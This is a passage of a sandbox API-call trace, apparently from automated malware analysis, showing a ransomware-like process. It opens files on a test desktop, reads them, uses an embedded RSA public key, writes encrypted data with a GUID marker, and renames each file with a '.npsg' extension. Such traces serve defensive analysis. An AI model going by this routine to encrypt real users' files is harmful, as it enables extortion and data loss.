(in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fffa8 | out: hHeap=0x620000) returned 1 [0236.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0236.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400038 | out: hHeap=0x620000) returned 1 [0236.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff90 | out: hHeap=0x620000) returned 1 [0236.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff60 | out: hHeap=0x620000) returned 1 [0236.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0236.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0236.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0236.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff48 | out: hHeap=0x620000) returned 1 [0236.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94df8 | out: hHeap=0x620000) returned 1 [0236.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0236.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0236.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0236.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0236.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0236.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0236.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.059] WriteFile (in: hFile=0x644, lpBuffer=0x3b7fcd0*, nNumberOfBytesToWrite=0xac29, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b7fcd0*, lpNumberOfBytesWritten=0x39afb14*=0xac29, lpOverlapped=0x0) returned 1 [0236.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7fcd0 | out: hHeap=0x620000) returned 1 [0236.060] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xac2e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.060] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0236.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cb70 [0236.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b7a060 [0236.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b7a060, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0236.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b947f8 [0236.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0236.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7cb70 | out: hHeap=0x620000) returned 1 [0236.060] WriteFile (in: hFile=0x644, lpBuffer=0x3b947f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b947f8*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0236.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0236.060] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.060] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.060] CloseHandle (hObject=0x644) returned 1 [0236.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0236.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x3b95d50 [0236.062] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0236.062] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6M2GPMSiVGm.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6m2gpmsivgm.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6M2GPMSiVGm.jpg.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6m2gpmsivgm.jpg.npsg")) returned 1 [0236.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0236.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.067] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x68a920 | out: hHeap=0x620000) returned 1 [0236.068] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x821b1a20, ftCreationTime.dwHighDateTime=0x1d5c289, ftLastAccessTime.dwLowDateTime=0xdbbcb3e0, ftLastAccessTime.dwHighDateTime=0x1d5c3e2, ftLastWriteTime.dwLowDateTime=0xdbbcb3e0, ftLastWriteTime.dwHighDateTime=0x1d5c3e2, nFileSizeHigh=0x0, nFileSizeLow=0xdcc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aBAkxckD12bhThY.wav", cAlternateFileName="ABAKXC~1.WAV")) returned 1 [0236.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0236.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a440 [0236.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0236.068] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aBAkxckD12bhThY.wav") returned=".wav" [0236.068] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aBAkxckD12bhThY.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\abakxckd12bhthy.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.069] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=3532) returned 1 [0236.069] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.071] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xda6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.072] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.074] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.074] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xdcc, lpOverlapped=0x0) returned 1 [0236.074] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.074] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.074] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.074] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a7f8) returned 1 [0236.075] CryptCreateHash (in: hProv=0x67a7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.075] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.075] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.075] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.075] GetLastError () returned 0x0 [0236.075] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.075] CryptReleaseContext (hProv=0x67a7f8, dwFlags=0x0) returned 1 [0236.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.076] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.076] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.076] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xdd0) returned 0x3b95d50 [0236.076] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0236.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0236.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0236.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b94df8 [0236.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff48 [0236.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b94e40 [0236.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff60 [0236.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff90 [0236.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400038 [0236.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fffa8 [0236.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0236.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x64dd08 [0236.077] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x64dd08, Size=0x218) returned 0x346fd28 [0236.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b96b28 [0236.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff90 | out: hHeap=0x620000) returned 1 [0236.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fffa8 | out: hHeap=0x620000) returned 1 [0236.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400038 | out: hHeap=0x620000) returned 1 [0236.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0236.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b96b28 | out: hHeap=0x620000) returned 1 [0236.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400038 [0236.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0236.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fffa8 [0236.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0236.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x33fff90 [0236.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0236.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0236.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0236.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0236.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0236.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0236.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0236.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fffa8 | out: hHeap=0x620000) returned 1 [0236.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff90 | out: hHeap=0x620000) returned 1 [0236.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400038 | out: hHeap=0x620000) returned 1 [0236.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0236.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fd28 | out: hHeap=0x620000) returned 1 [0236.078] GetCurrentThreadId () returned 0x5b4 [0236.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0236.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x688090 [0236.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0236.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0236.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0236.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0236.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0236.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.078] GetCurrentThreadId () returned 0x5b4 [0236.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0236.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0236.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c52a8 [0236.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0236.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400038 [0236.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0236.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0236.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0236.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0236.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff90 [0236.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0236.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0236.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0236.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0236.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fffa8 [0236.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0236.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0236.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0236.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff78 [0236.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0236.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400050 [0236.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0236.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0236.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400020 [0236.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400008 [0236.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400068 [0236.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400008 | out: hHeap=0x620000) returned 1 [0236.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400008 [0236.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400020 | out: hHeap=0x620000) returned 1 [0236.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0236.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0236.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.081] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xdcc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.081] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0236.081] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.081] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.081] CloseHandle (hObject=0x644) returned 1 [0236.082] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aBAkxckD12bhThY.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\abakxckd12bhthy.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aBAkxckD12bhThY.wav.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\abakxckd12bhthy.wav.npsg")) returned 1 [0236.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0236.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.083] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a440 | out: hHeap=0x620000) returned 1 [0236.085] FindNextFileW (in: hFindFile=0x33f03c8, 